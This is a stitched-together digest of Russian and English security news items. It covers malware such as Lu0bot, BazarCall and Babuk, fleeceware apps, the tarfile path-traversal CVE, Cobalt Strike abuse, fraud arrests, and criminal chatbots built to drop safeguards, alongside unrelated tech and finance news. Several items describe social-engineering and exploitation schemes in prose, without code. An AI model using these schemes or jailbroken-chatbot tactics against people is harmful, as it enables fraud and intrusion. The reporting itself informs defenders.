Исследователь, действующий под онлайн-псевдонимом Fumik0_, углубился в изучение таинственного вредоноса и [представил](https://fumik0.com/2021/06/24/lu0bot-an-unknown- nodejs-malware-using-udp/) несколько выводов.
Впервые Lu0bot попался экспертам в феврале 2021 года, тогда он выступал в качестве пейлоада второй стадии в атаках GCleaner. Если кто не знает, GCleaner — разработчик сомнительного софта, который продаёт киберпреступникам доступ к компьютерам пользователей.
Lu0bot представляет собой маленький кусок кода на C/C++, он загружает и устанавливает в заражённые системы сервер Node.js, а затем использует сложный многослойный JavaScript-код, чтобы запутать исследователей и скрыть свои истинные цели.
Помимо этого, Lu0bot прибегает к помощи множества самых разных алгоритмов шифрования: XOR, AES-128-CBC, Diffie-Hellman и Blowfish. Вредонос также случайным образом переключается между UDP и TCP.
Одно специалисты выяснили точно — Lu0bot отлично собирает данные жертвы и информацию о заражённой системе. Однако такую функциональность можно встретить у многих вредоносных программ. Как отметил Fumik0_, Lu0bot может быть чем угодно — от бэкдора до трояна, открывающего удалённый доступ.
Инженерам Toshiba удалось отправить квантовую информацию по оптическому волокну длиной 600 километров и установить новый рекорд. Об этом сообщается на сайте японской корпорации.
В отчете говорится, что благодаря новой технологии, которая стабилизирует колебания в окружающей среде, специалистам удалось продемонстрировать передачу квантовых битов (кубитов) на расстоянии в сотни километров. На основе данного изобретения ученые могут разработать сеть нового поколения, по которой можно будет безопасно передавать данные между городами и целыми странами.
Передаваемая по оптоволокну информация зашифрована с помощью технологии квантового распределения ключей (QKD). Инженеры отметили, что для создания ключей шифрования протокол использует квантовые сети, которые практически невосприимчивы к взлому. В случае проникновения в сеть обе стороны будут предупреждены. Это означает, что пользователи и корпорации могут делиться ценными данными на огромных расстояниях, не опасаясь утечки.
До недавнего времени передача кубитов по оптоволоконным сетям была ограничена небольшой протяженностью сети. Небольшие изменения в окружающей среде, как колебания температуры, могут вызвать расширение или сжатие кабеля и уничтожение информации. Чтобы снизить воздействие среды, инженеры Toshiba разработали метод, называемый двухдиапазонной стабилизацией. В этом случае данные отправляются посредством двух сигналов — первый компенсирует быстро меняющиеся флуктуации, второй используется для более точной настройки фазы. Таким образом можно качественно передавать данные на расстоянии до 600 километров.
«Благодаря новым методам, которые мы разработали, дальнейшее расширение расстояния связи для QKD все еще возможно, и наши решения также могут быть применены к другим протоколам и приложениям квантовой связи», — заметил научный сотрудник Toshiba Europe Мирко Питталуга (Mirko Pittaluga). В планах компании протянуть безопасную сверхскоростную магистраль, объединяющую Лондон, Париж, Брюссель, Амстердам и Дублин.
Кубит — наименьшая единица информации в квантовом компьютере, использующаяся для квантовых вычислений. В конце мая Google объявила, что создаст квантовый компьютер за несколько миллиардов долларов. Новое устройство позволит выполнять вычисления, на которые современный компьютер потратит 10 тысяч лет, за три с половиной минуты.
Малварь BazarCall (или BazaCall) впервые была обнаружена в январе 2021 года. Такое название вредонос получил из-за того, что на первых порах с его помощью распространялся BazarLoader. И хотя теперь BazarCall распространяет уже другую малварь, название прижилось.
Операторы BazarCall действуют по простой, но очень эффективной схеме. Всё традиционно начинается с фишинговых писем, и чтобы привлечь внимание будущей жертвы, хакеры используют приманки, связанные бесплатными пробными версиями различных продуктов и якобы истекающими подписками на медицинские, ИТ или финансовые услуги (которые нужно срочно отменить, во избежание списания средств). При этом все письма содержат инструкцию, согласно которой, для отмены подписки получатель должен позвонить по указанному номеру телефона.
Позвонив по такому номеру, пользователь связывается с колл-центром, англоговорящий оператор которого проведет пошаговый инструктаж для жертвы. Сначала оператор вынудит доверчивого пользователя сообщить уникальный идентификатор клиента, указанный в письме. Таким образом в колл-центре определят, что говорят именно с жертвой кампании BazarCall. Если сообщить неверный номер, оператор скажет, что подписка уже отменена и попрощается.
Если номер актуален, звонящего вынудят посетить вредоносный сайт и загрузить оттуда файл Office (обычно Excel или Word), якобы содержащий форму для отмены подписки. Затем понадобится отключить функции безопасности и разрешить работу макросов в документе, которые и загрузят BazarLoader. В некоторых случаях оператор также может попросить жертву отключить антивирус.
Один из таких звонков записал и опубликовал на YouTube ИБ-эксперт Брэд Дункан:
Эти спам-кампании почти всегда нацелены на пользователей с корпоративными email-адресами или адресами в зоне .edu. То есть хакеры почти не атакуют рядовых пользователей, которые используют бесплатные почтовые сервисы, включая Gmail, Hotmail и Yahoo. Очевидно, конечной целью злоумышленников является заражение крупных корпоративных сетей.
Из-за экзотического метода распространения малварь имеет низкий уровень обнаружения на VirusTotal, ведь она не распространяется публично и плохо обнаруживается антивирусами.
В настоящее время BazarLoader используется для распространения таких вредоносов, как TrickBot, IcedID, Gozi IFSB и так далее. В свою очередь Trickbot применяется для развертывания шифровальщиков Ryuk или Conti, а IcedID раньше использовался для развертывания вымогателей Maze и Egregor.
Интересно, что связь между BazarCall и TrickBot ранее уже обнаруживал известный ИБ-эксперт Виталий Кремез, — считается, что оба образца малвари созданы одной хак-группой. Однако с другими вредоносами из числа перечисленных выше BazarCall не связан.
Издание Bleeping Computer пишет, что, по информации аналитиков компании Binary Defense, мошенническим колл-центром управляет другая хак-группа, для которой распространение малвари является обычной услугой. При этом колл-центр работает как обычная компания: с понедельника по пятницу, соблюдая рабочие часы.
В последние дни связаться с колл-центром преступников не удается из-за постоянно меняющейся инфраструктуры. В силу повышенного интереса со стороны ИБ-специалистов преступники вынуждены очень часто менять номера телефонов и хостинг.
• Source: <https://www.vkremez.com/2020/04/lets-learn-trickbot- bazarbackdoor.html>
• Source: https://www.bleepingcomputer[.]com/...ses-malicious-call-centers-to- infect-victims/
Эксперты компании Avast обнаружили 204 fleeceware-приложения в App Store и Google Play (134 для iOS и 70 для Android). Эти приложения были загружены более миллиарда раз и уже принесли своим авторам более 400 000 000 долларов США.
Напомню, что это сравнительно новая разновидность вредоносного ПО: данный термин был придуман компанией Sophos в конце прошлого года и тогда относился исключительно к приложениям для Android.
Реклама fleeceware-приложений часто появляется в социальных сетях, таких как Facebook, Instagram, Snapchat и TikTok. Такие приложения используют юридические лазейки, связанные с механизмом пробного периода. Так, если после окончания бесплатного периода пользователь просто удалит такое приложение, не отменяя подписку, деньги за его использование продолжат списываться со счета. К примеру, обнаруженные в прошлом году Android-приложения были установлены более 600 000 000 раз, игнорировали удаление и окончание пробного периода, и продолжали брать с пользователей немалые деньги (от 100 до 240 долларов в год) за самые простые инструменты, такие как сканеры QR-кодов и калькуляторы.
В основном найденные теперь специалистами Avast fleeceware-приложения представляют собой симуляторы музыкальных инструментов, редакторы фотографий, фильтры для камеры, приложения для хиромантии и предсказаний будущего, а также сканеры для чтения QR-кодов и PDF-файлов.
Эксперты рассказывают, что, например, приложение FortuneScope после короткого пробного периода списывает 66 долларов (примерно 5 000 рублей) в неделю, что обойдется жертве в 3 432 доллара (около 300 000 рублей) в год, если подписку не отменить. При этом стоимость большинства обнаруженных аналитиками приложений составляет от 4 до 12 долларов в неделю, то есть от 208 до 624 долларов в год.
[](https://xakep.ru/wp- content/uploads/2021/03/344093/pasted-image-0.png)
[](https://xakep.ru/wp- content/uploads/2021/03/344093/Screenshot_20210315-130429.png)
«Несмотря на то, что эти приложения в основном выполняют свои функции, вряд ли пользователи захотели бы регулярно оплачивать дорогостоящую подписку, если бы знали ее реальную стоимость. Особенно учитывая существование более дешевых или даже бесплатных аналогов таких приложений, — говорит Якуб Вавра, исследователь угроз в Avast. — Похоже, эти fleeceware-приложения в первую очередь нацелены на детей и подростков. Такой вывод можно сделать из красочных скриншотов и рекламных баннеров таких приложений в популярных социальных сетях, в которых предлагается “бесплатно скачать” или “бесплатно установить” такие приложения. Пока родители заметят еженедельные денежные списания, создатели fleeceware-приложений уже могут получить значительный доход».
Click to expand...
Полный список fleeceware-приложений, найденных в Google Play Store можно найти здесь, а в Apple AppStore — здесь.
Источник: xakep.ru/2021/03/25/new-fleeceware/
Microsoft says that Windows Server 2022 will come with security improvements and will bring Secured-core to the Windows Server platform.
Windows Server 2022 "provides secured connectivity enabled by industry- standard AES 256 encryption," Microsoft said.
The next Windows Server release will also improve hybrid server management by
enhancing performance monitoring and event alerts in Windows Admin Center.
"Furthermore, this release includes significant improvements to Windows
container runtime, such as virtualized time zones and IPV6 support for
globally scalable apps, as well as containerization tools for .NET, ASP.NET,
and IIS applications," Microsoft added at Microsoft Ignite 2021.
This release will also bring Secured-core to Windows Server for added protection against a wide range of threats for systems running workloads on Windows Server 2022.
Secured-core PCs come as a solution for the number of increasing firmware vulnerabilities that attackers can exploit to bypass a Windows machine's Secure Boot and the lack of visibility at the firmware level present in today's endpoint security solutions.
Built-in protection capabilities designed to defend users against threats (both state-sponsored hacking attacks and commodity malware) abusing firmware and driver security flaws are included with all Secured-core PCs since October 2019.
They can also defend users against malware designed to take advantage of driver security flaws to disable security solutions.
Secured-core PCs built by Microsoft in collaboration with OEM partners and silicon vendors protect users against such attacks by following these requirements:
All Secured-core PCs follow these provisions to boot securely, protect themselves from firmware security bugs, shield the OS from attacks, prevent unauthorized access, and secure users' identity and domain credentials.
Microsoft also introduced the Edge Secured-core device label at Microsoft Ignite 2021 to identify Azure IoT Edge devices that meet the Secured-core spec.
The new device label is no in public preview within the Azure Certified Device program after previously being announced for Windows enterprise devices.
"Now, enterprise customers seeking Internet of Things (IoT) devices that meet the Azure defined security bar can easily identify device models that have the Edge Secured-core label in the Azure Device Catalog," Microsoft said.
"As part of this requirement, devices will have Azure Defender for IoT built- in."
Ограничение позволят сделать финансовый сектор максимально прозрачным.
Европейская комиссия представила пакет законодательных предложений по усилению правил ЕС по борьбе с отмыванием денег и финансированием терроризма. Предложенные нововведения могут ограничить платежи наличными и запретить анонимные транзакции с криптовалютой.
В настоящее время только определенные категории поставщиков услуг криптоактивов включены в сферу действия правил ЕС. Предлагаемая реформа распространит правила на весь криптосектор, обязывая всех поставщиков услуг проводить комплексную проверку своих клиентов. Поправки призваны обеспечить полную отслеживаемость переводов криптовалютных транзакций, включая биткойны, и позволят предотвращать и обнаруживать их возможное использование для отмывания денег или финансирования терроризма.
Кроме того, анонимные криптовалютные кошельки будут запрещены. Ограничение платежей наличными и запрет на анонимные криптокошельки позволят сделать финансовый сектор максимально прозрачным, поскольку анонимные банковские счета уже запрещены законами ЕС, считают в Еврокомиссии.
В Еврокомиссии заявляют, что новые правила борьбы с отмыванием денег
планируется ввести не позже 2024 года.
Подробнее:
https://www.securitylab.ru/news/522510.php
"Американский военный" выманил у борисовчанки свыше Br12 тыс. Об этом БЕЛТА сообщила официальный представитель УСК по Минской области Елена Крупенина.
"В августе 2020 года в социальной сети 47-летняя жительница Борисова познакомилась с мужчиной, который представился американским военным. О себе он сообщил, что служит в Афганистане, вдовец, в США у него растет сын. В дальнейшем они регулярно переписывались, в том числе в мессенджере WhatsApp",
Расположив к себе женщину, "американец" рассказал, что все свои сбережения перевел в золотые слитки и скоро приедет к ней. В связи с этим он попросил оказать помощь в их доставке. По его словам, золото находится в Афганистане. Борисовчанка должна была оплатить доставку, легализовать посылку и оплатить таможенный сбор. Мужчина настойчиво просил помощи, обещая, что при встрече сразу же вернет потраченные денежные средства.
Помимо этого, общаясь в январе, военный предложил также оплатить его отпуск, переведя для этих целей $500, после чего обещал приехать в Беларусь.
В общей сложности доверчивая женщина, общаясь с "американским военным", в несколько этапов перечислила более Br12 тыс., оплатив якобы доставку посылки, ее легализацию, а также отпуск для друга по переписке. Когда американец не приехал на встречу в Борисов, потерпевшая поняла, что ее обманули, и обратилась с заявлением в правоохранительные органы.
По данному факту Борисовский РОСК возбудил уголовное дело по ч.3 ст.209 (мошенничество в крупном размере) УК. В настоящее время проводятся необходимые следственные действия, направленные на установление лиц, причастных к совершению преступления. Осмотрена переписка потерпевшей, скриншоты приобщены к материалам дела. Расследование продолжается.
Самыми популярными чат-ботами, используемыми в киберпреступных целях, стали закрытый WormGPT, FraudGPT и DarkBard. К такому выводу пришли ([https://www.darkowl.com/blog-conten...xploit-ai-large-language-models-like- chatgpt/](https://www.darkowl.com/blog-content/how-cyber-criminals-exploit-ai- large-language-models-like-chatgpt/)) исследователи DarkOwl, отметив, впрочем, что все эти решения являются отчасти рудиментарными и приносят пользу не только хакерам и кибермошенникам, но и пентестерам.
В частности, анализ показал, что слова «взлом» («jailbreak») и «GPT» более двух тысяч раз вместе упоминаются в целостных сообщениях на различных даркнет- форумах, торговых площадках и в Telegram-каналах. Этот показатель выше, чем по отдельности для WormGPT, FraudGPT и DarkBard, однако взлом GhatGPT интересует не только киберсообщество, но и, например, боевиков из ультраправых американских объединений. Из этого можно сделать вывод, что в первую очередь интересующимся темой пользователям хочется убрать этические ограничения популярных решений.
FraudGPT — интеллектуальный чат-бот, который использует популярные языковые модели, созданные Google, Microsoft и OpenAI, и устраняет любые этические барьеры, связанные с применением подобного рода инструментов. Киберпреступные версии обычно необходимы даркнет-сообществам для создания аутентичных фишинговых писем, текстовых сообщений или поддельных веб-сайтов. В недавней рекламе на кардерском форуме Carder.uk подписка на FraudGPT продавалась за 200 долларов в месяц или 1700 долларов в год.
DarkBard — еще один альтернативный чат-бот, но менее популярный, чем FraudGPT или WormGPT, причем дистрибьютером решения был пользователь многих даркнет- площадок с ником CanadianKingpin12. Он также занимался распространением WormGPT, когда тот еще существовал, правда, не совсем понятно, связан ли он с не так давно деанонимизированным (https://t.me/c/1139936604/13192) разработчиком решения из Португалии.
Аналитики DarkOwl также заметили, что в сообществе созрел запрос на обход этических ограничений в интересах пентестинга. Один из репозиториев Github с названием GreyDGL/Pentest GPT описывается, как инструмент для тестирования на проникновение, основанный на моделях LLM. Он предназначен для автоматизации пентестинга, построен на базе ChatGPT и работает в интерактивном режиме, помогая тестерам как в целом, так и при реализации конкретных операций.
t.me
По данным информационного агентства, кризис ликвидности биржи FTX может быть
связан с намерением генерального директора поддержать другую свою компанию —
Alameda Research. Сэма Бэнкмана-Фрида (Sam Bankman-Fried) накануне кризиса
перевел около $4 млрд, включая депозиты клиентов, в Alameda, уверяют источники
Reuters. При этом Бэнкман-Фрида не проинформировал о проведении операции
других руководителей FTX, якобы их-за опасений, что информация о проблемах
Alameda может стать достоянием общественности. По инсайдерской информации,
проблемы FTX начались еще раньше, когда Бэнкман-Фрид активно пытался спасти
другие терпящие крах криптовалютные компании. Согласно нескольким людям,
близким Бэнкману-Фриду, FTX и Alameda Research не приняли во внимание
макроэкономические условия, высокую инфляцию и рост процентных ставок. Они
допустили ряд критических ошибок, которые в последствии привели к убыткам и
краху ликвидности криптобиржи.
Инсайдеры сообщили Reuters об ожесточенном соперничестве между FTX и Binance,
которые в последние месяцы боролись за доли рынка и подозревали друг друга в
стремлении навредить бизнесу.
Ранее стало известно, что официально Binance
[вышла](https://bits.media/binance-ofitsialno-zayavila-o-sryve-sdelki-po-
pogloshcheniyu-ftx/) из сделки по приобретении биржи FTX.
Источник: <https://bits.media/smi-glava-ftx-tayno-perevel-4-mlrd-v-alameda- research-nakanune-krizisa/>
Уязвимость в Python, на которую не обращали внимания в течение 15 лет, теперь снова в центре внимания, поскольку она затрагивает более 350 000 репозиториев с открытым исходным кодом и может привести к RCE.
Раскрытая в 2007 году и отмеченная как CVE-2007-4559 ошибка так и не была исправлена. Под нее лишь переделали документацию, предупреждающую разработчиков об возможных рисках в цепочке поставок ПО.
Уязвимость затрагивает пакет tarfile Python и связана с неправильной реализацией функции tarfile.extract(). Она представляет собой проблему обхода пути, которая позволяет злоумышленнику перезаписывать произвольные файлы.
Технические детали CVE-2007-4559 доступны с момента выхода первоначального отчета в августе 2007 года, данных об использовании этой ошибки отсутствуют.
Однако в этом году в ходе расследования инцидента CVE-2007-4559 была [повторно обнаружена](https://www.trellix.com/en-us/about/newsroom/stories/threat- labs/tarfile-exploiting-the-world.html) ресерчерами Trellix Advanced Threat Research, о чем он упомянул в системе отслеживания ошибок Python и получил ответ о закрытии баги документацией.
Он выяснил, что недостаток связан с тем, что код в функции извлечения в модуле tarfile Python явно доверяет информации в объекте TarInfo и объединяет путь, который передается функции извлечения, и имя в объекте TarInfo. В конечном итоге, позволяет злоумышленнику получить доступ к файловой системе.
Анализируя ситуацию, Trellix извлекли набор из 257 репозиториев, которые с большей вероятностью содержат уязвимый код, и вручную проверили 175, выяснив, что 61% репозиториев были уязвимы.
Далее с помощью GitHub они идентифицировали 588 840 уникальных репозиториев, которые включают import tarfile в свой код Python.
Но, что еще более усугубляет проблему: более 350 000 уязвимых репозиториев применяют инструменты машинного обучения (например, GitHub Copilot), распространяя небезопасный код на другие проекты без ведома разработчика.
Trellix описали простой алгоритм эксплуатации CVE-2007-4559 в версии Spyder IDE для Windows.
Показали, что уязвимость можно использовать и в Linux. Им удалось ускорить запись файла и добиться RCE в тесте службы управления ИТ-инфраструктурой Polemarch.
Помимо исследования уязвимости и ее последствий, Trellix выпустили исправления для 11 000 проектов, которые позже они будут добавлены через пулреквесты.
Кроме того, планируется, что более 70 000 проектов также получат исправления в ближайшие несколько недель.
В рамках международной операции Delilah в Нигерии был арестован предполагаемый лидер группы киберпреступников, занимавшейся массовыми фишинговыми рассылками и компрометацией деловой почты.
В рамках международной операции Delilah эксперты Group-IB предоставили правоохранительным органам данные, которые позволили идентифицировать предполагаемого лидера группы, занимавшейся массовыми фишинговыми рассылками и компрометацией деловой почты (Business Email Compromise, BEC). Благодаря собранным цифровым доказательствам полиция Нигерии смогла задержать киберпреступника, говорится в пресс-релизе компании.
Delilah — это уже третья по счету операция Интерпола, проводимая в тесном сотрудничестве с полицией Нигерии, экспертами Group-IB, Palo Alto Networks и Trend Micro, против членов хакерской сети ТМТ (SilverTerrier). Delilah предшествовали операции Falcon I в 2020 году и Falcon II в 2021 году — в результате были арестованы 14 предполагаемых членов группировки.
Group-IB следит за деятельностью преступной группы TMT начиная с 2019 года. По данным экспертов, к 2020 году TMT скомпрометировала более 500 000 e-mail адресов государственных и частных компаний в более чем 150 странах мира. Например, на ноутбуке одного из подозреваемых, задержанного в Нигерии во время операции Falcon II, полицейские обнаружили более 800 000 учетных данных потенциальных жертв.
В мае 2021 года полицейская операция под кодовым названием Delilah была инициирована экспертами из Group-IB, Palo Alto Networks — Unit 42 и Trend Micro. Полученные данные были дополнены информацией аналитиков из INTERPOL Cyber Fusion Centre и направлены в Нигерию для завершения расследования при поддержке правоохранительных органов Австралии, Канады и США.
В результате оперативники смогли не только идентифицировать личность подозреваемого — 37-летнего лидера группы (на фото), но и получили возможность дистанционно отслеживать все действия злоумышленника в сети, в том числе контролировать его перемещения из одной страны в другую. В итоге правоохранительные органы Нигерии успешно задержали подозреваемого в международном аэропорту Murtala Muhammed в Лагосе, ему предъявлены обвинения.
«Операция Delilah наглядно демонстрирует, насколько эффективной может быть борьба с киберпреступностью, когда все стороны расследования вовлечены и заинтересованы в результате», — отметил генеральный директор Group-IB Дмитрий Волков.
По словам Волкова, компания гордится тем, что правоохранительные органы использовали опыт российских специалистов.
source: interpol.int/News-and-Events/News/2022/Suspected-head-of-cybercrime- gang-arrested-in-Nigeria
Attackers Keep Wielding Legitimate Tools and 'Living Off the Land' Tactics
Attackers continue to use the legitimate Cobalt Strike tool set to target
victims.
Many attackers - highly skilled or otherwise - employ "living off the land" tactics, which means using legitimate tools or functionality already present in a network to target a victim. Accordingly, organizations need to do everything in their power to either block or at least closely monitor for such activity.
See Also: Getting Started With CASB
The trouble with detecting and blocking such attacks, which are launched by both criminal and [nation-state](https://www.databreachtoday.com/crypto- platform-suffers-log4j-related-ransomware-attack-a-18219) hackers, is that they're designed to look legitimate.
While such attacks are not new, they continue to bedevil organizations. In March, Microsoft warned that attackers were [wielding Azure "LoLBins,"](https://www.databreachtoday.com/hackers-waging-living-off-land- attacks-on-azure-a-16158) aka "living off the land binaries" with an extra helping of hacker lulz - which refers to weaponizing preinstalled, legitimate binaries built to run on Windows or Linux.
In September, a [joint U.S. government alert](https://www.databreachtoday.com/us-warns-nation-state-groups-may- exploit-flaw-in-zoho-tool-a-17562) warned attackers were using living-off-the- land tactics to exploit a vulnerability in Zoho's single sign-on and password management tool.
Other types of living-off-the-land attacks continue to abound. One tool favored by both criminal hackers and nation-state attackers [remains Cobalt Strike](https://www.databreachtoday.com/attackers-increasingly-using-cobalt- strike-a-16959), which is a legitimate tool marketed by its makers as "software for adversary simulations and red team operations." But attackers also use cracked copies of the tool to build botnets.
Earlier this month, security researchers warned that [Emotet malware was pushing Cobalt Strike beacons](https://www.databreachtoday.com/emotet-tactic- may-presage-more-rapid-ransomware-infections-a-18090) directly onto infected endpoints, so attackers could more quickly evaluate the endpoint and see if they wished to escalate the attack, for example, by pushing ransomware onto the endpoint. Other attackers regularly use Cobalt Strike for "lateral movement," meaning the endpoint becomes the beachhead in a lengthier attack, during which they'll typically attempt to escalate privileges, access Active Directory Domain Controller, and use that to steal sensitive data, infect systems with crypto-locking malware and more.
Emotet infection process (Source:U.S. Cybersecurity and Infrastructure
Security Agency)
Cobalt Strike employs a client/server approach and is based on a beacon, which is a payload that gets installed on a target system and that communicates with a command-and-control server via DNS, HTTP or HTTPS, according to a teardown published by European cybersecurity firm Sekoia. Beacons get controlled remotely by an administrator, using a Cobalt Strike client - aka the Aggressor - which connects to command-and-control Team servers that run on Linux OS.
By connecting to the Team server that manages a particular endpoint via its beacon, an administrator can remotely configure the beacon as well as receive "all information from the infected hosts," Sekoia says.
"Cobalt Strike is unique in that its built-in capabilities enable it to be quickly deployed and operationalized regardless of actor sophistication or access to human or financial resources," security firm [Proofpoint](https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike- favorite-tool-apt-crimeware) said in a report released earlier this year.
How quick is quick? Earlier this month, threat intelligence firm Active Intelligence warned in the wake of the Log4j vulnerability becoming public knowledge that the [Conti ransomware group](https://www.databreachtoday.com/conti-ransomware-threat-rising-as- group-gains-affiliates-a-17448) appeared to be scanning for the vulnerability, using endpoints it had already infected with Cobalt Strike. In particular, Conti appeared to be attempting to [exploit the Log4j functionality](https://www.advintel.io/post/ransomware-advisory-log4shell- exploitation-for-initial-access-lateral-movement) built into VMware vCenter server management software. A successful exploit, Advanced Intelligence warned, would give the attackers the ability to move laterally in a victim's network.
The propensity of both [criminals](https://www.databreachtoday.com/attackers- increasingly-using-cobalt-strike-a-16959) and [nation-state attackers](https://www.databreachtoday.com/mandiant-solarwinds-attackers- continue-to-innovate-a-18065) to employ Cobalt Strike for unhealthy purposes - not least in the SolarWinds supply chain attack - has led [Bob McArdle](https://www.databreachtoday.com/ransomware-response-dominate-irish- cybercrime-conference-a-17940), director of Trend Micro's Forward-Looking Threat Research team in Europe, to dub Cobalt Strike "the Big Tobacco" of the cybersecurity field.
Given the risk posed by Cobalt Strike and its ilk, McArdle - in a presentation at last month's Irish Reporting and Information Security Service conference [IRISSCON](https://www.databreachtoday.com/blogs/17-scenes-from-irisscon- irish-cybercrime-conference-p-3151) in Dublin - recommended that all organizations "ban hacking and enumeration tools from the network," including Cobalt Strike.
Bob McArdle details attacker tactics at the IRISSCON conference in Dublin on
Nov. 18.
"In general for those tools - a lot of them fall into 'dual usage,' including PowerShell, PSExec, or even tools like AdFind," McArdle tells me, referring to the powerful scripting language built into Windows (PowerShell), a lightweight replacement for telnet (PSExec), and a command line Active Directory query tool (AdFind).
That doesn't mean the use of these and other such tools - also including the Metasploit open-source penetration testing framework, Cobalt Strike, and other "potentially unwanted applications" - always goes unnoticed. But unless organizations are monitoring for such tools with an eye to their being used maliciously, alarm bells may not sound.
"A lot of security products detect them as Hacktool_ or PUA_ instead of more fully malicious ones like TROJ_," McArdle says. "So it's important for companies to be aware of this and to treat those sort of detections just as dangerously, especially when they're running outside of any machines tagged as being in the admin group."
In other words, in theory, detecting the malicious use of such tools isn't difficult. But in practice, don't expect such capabilities to be active by default.
"Most modern security software should have process and file-access control that can be configured for tools like PowerShell, but a lot of organizations might not be aware of this," McArdle says. "A modern security suite does, after all, have a lot of options. So educating people to go look into those and enable them is a good first step."
more info: <https://www.databreachtoday.com/blogs/block-this-now-cobalt- strike-other-red-team-tools-p-3167>
Click to expand...
Пока мама была на работе, а папа в командировке в Китае, мальчику позвонила мошенница под видом служащей МВД. Она сказала, что пытается спасти пешехода, которого случайно сбила, но для этого нужны деньги.
Мальчик впечатлился, взял из сейфа родителей наличку и драгоценности и передал пришедшему мужчине. После чего «полицейская» позвонила снова и потребовала ещё. Остановил мальчика старший брат, пришедший из школы. Мама написала заявление в полицию.
Петербургское отделение Интерпола задержало гражданина Казахстана, которого
уже два года разыскивают в полицейские Австрии за интернет-мошенничество.
В Санкт-Петербурге сотрудники Интерпола нашли хакера, разыскиваемого за хищение 1,2 миллиона евро со счетов 200 вкладчиков банков в Австрии. Об этом сообщает «Фонтанка».
33-летнего мужчину обвиняют в преступлениях на 1,2 миллиона евро. Полиция задержала подозреваемого накануне вечером у отеля в Батайском переулке. Гражданина Казахстана обвиняют в организации схемы, по которой на компьютер клиентов австрийских банков поступало письмо с вирусом. Когда его открывали, запускался вирус, позволяющий контролировать денежные переводы. С 2013 года мужчина лишил 192 австрийцев более миллиона евро. За аналогичные преступления мошенник также отсидел в США.
ФБР оказало содействие европейским коллегам в установлении причастности гражданина Казахстана к схеме, однако самостоятельно не смогло его задержать.
Подробнее: https://www.securitylab.ru/news/521024.php
Издание Bleeping Computer сообщает, что операторы шифровальщика Babuk заявили, что намерены прекратить работу. На сайте группировки появилось новое сообщение, озаглавленное «Hello World 2», где преступники пишут, что достигли поставленных целей и решили свернуть свои операции.
Однако хакеры не планируют публиковать ключи для дешифрования бесплатно или возвращать выкупы жертвам, как это делали другие группы. Вместо этого Babuk станет опенсорным RaaS.
Журналисты отмечают, что сообщение хакеров несколько раз менялось. Так, в одной из версий, замеченной аналитиками Recorded Future, преступники заявляли, что взлом «ПД стал нашей последней целью», имея в виду их последнюю жертву — Центральный полицейский департамент округа Колумбия.
В другом варианте сообщения, полиция вообще не упоминалась вообще, и расплывчато сообщалось, что группа намерена прекратить операции в обозримом будущем.

При этом одна часть сообщения всегда остается неизменной: операторы малвари пишут, что «сделают что-то вроде Open Source RaaS, где каждый может создать собственный продукт на основе нашего продукта и закончить с остальной частью RaaS [самостоятельно]».
Журналисты напоминают, что Babuk был замечен исследователями в начале текущего года. Он атаковал жертв по всему миру и требовал выкупа в размере от 60 000 до 85 000 долларов США в криптовалюте. Каждый исполняемый файл малвари был настроен для отдельной жертвы, а вредонос имел жестко запрограммированные расширения, записку с требованием выкупа и Tor-адрес для связи с хакерами.
Изначально операторы Babuk заявляли, что не будут атаковать некоторые некоммерческие организации, а также организации в сфере здравоохранения, образования и малого бизнеса. Однако вскоре преступники заявили, что «работают» с осени 2020 года и удалили упоминания о каких-либо исключениях со своего сайта.
Неясно, сколько именно организаций в итоге стали жертвами Babuk. В настоящее время на сайте вымогателей перечислено более десятка компаний, которые не заплатили выкуп.
Источник: xakep.ru/2021/04/30/babuk/
Украинский хакер помогал обходить системы защиты финансовых учреждений стран Европейского Союза.
В суд направлен обвинительный акт в отношении гражданина Украины по факту создания и сбыта вредоносных программных средств (ч. 1 ст. 361-1 УК Украины).
По данным следствия, обвиняемый специализировался на модификации и криптовании вредоносного программного обеспечения типа вирусы-шифровальщики (Ransomware), которое в дальнейшем сбывал хакерской группировкой для совершения противоправной деятельности.
Это тип вредоносной программы, с использованием которой хакеры заражают компьютеры потерпевших, что позволяет удаленно зашифровать информацию и в дальнейшем требовать выкуп за якобы разблокирование доступа к зашифрованным данным. Хакерские атаки были направлены на финансовые учреждения европейских стран.
По результатам проведения технических экспертиз у обвиняемого были выявлены сотни различных вредоносных программных продуктов, которые модифицировались и криптовались, что позволяло "обходить" современные антивирусные программы, информирует пресслужба Генпрокуратуры.
• Source: gp.gov.ua/ua/news?_m=publications&_c=view&_t=rec&id=293263&fbclid=IwAR08fPLnNF_Iv- PCwntpi_Vy9lrMh0CDuLWiPJNevluL1jJbSo_yrlj_vIs
Тульским сотрудникам уголовного розыска поступила информация о том, что в течение длительного времени на территории областного центра неизвестными лицами осуществляется активация SIM-карт, предположительно с целью пособничества совершаемым мошенническим действиям. При проведении оперативных мероприятий, в том числе технического характера, была установлена личность и местонахождение 22-летнего молодого человека, причастного к данному противоправному деянию. Полицейскими при поддержке сотрудников Росгвардии он был задержан в коттедже, расположенном на окраине Тулы.
По предварительной информации, задержанный осуществлял противоправную деятельность с конца осени прошлого года. Он пояснил, что заказывал SIM-карты сотовых операторов в интернет-магазинах, которые ему доставлял курьер. После этого с помощью приобретенного SIM-бокса активировал их, создавая аккаунты в социальных сетях или мессенджерах для подключения дистанционного обслуживания в кредитно-финансовых организациях КИВИ банк, Ozon банк и ЮMoney, и сообщая заказчикам сведения, необходимые для дальнейшей работы с ними. Впоследствии на эти аккаунты, привязанные к вышеуказанным банкам, поступали денежные средства от совершенных преступниками мошеннических действий. Ежедневно молодой человек активировал более 100 SIM-карт, получая оплату за каждую проведенную операцию.
Как установили оперативники, преступные действия задержанного позволили мошенникам на протяжении нескольких месяцев похищать денежные средства граждан, проживающих практически во всех регионах страны. В ходе обыска в доме, где проживает задержанный, оперативниками изъят дорогостоящий компьютер, SIM-бокс, мобильные телефоны, более 550-ти неиспользованных SIM-карт, интернет-переписка с непосредственными заказчиками.
В настоящее время в ГУ МВД России по Пермскому краю возбуждено и расследуется уголовное дело по признакам преступления, предусмотренного п. «г» ч. 3 ст. 158 УК РФ «Кража». Молодому человеку грозит наказание до шести лет лишения свободы.
• Video: https://rutube.ru/video/1ae324bcacb2cf7dd2264eb603883d8a/?r=plemwd
На прошлой неделе стало известно, что операторы вымогателя REvil пытаются шантажировать компанию Apple. Хакеры утверждают, что получили данные о продуктах Apple после взлома тайваньской компании Quanta Computer. Это крупнейший в мире производитель ноутбуков, а также одна из немногих компаний, которая собирает продукты Apple на основе предоставленных им дизайнов и схем (в том числе Watch, Apple Macbook Air и Apple Macbook Pro).
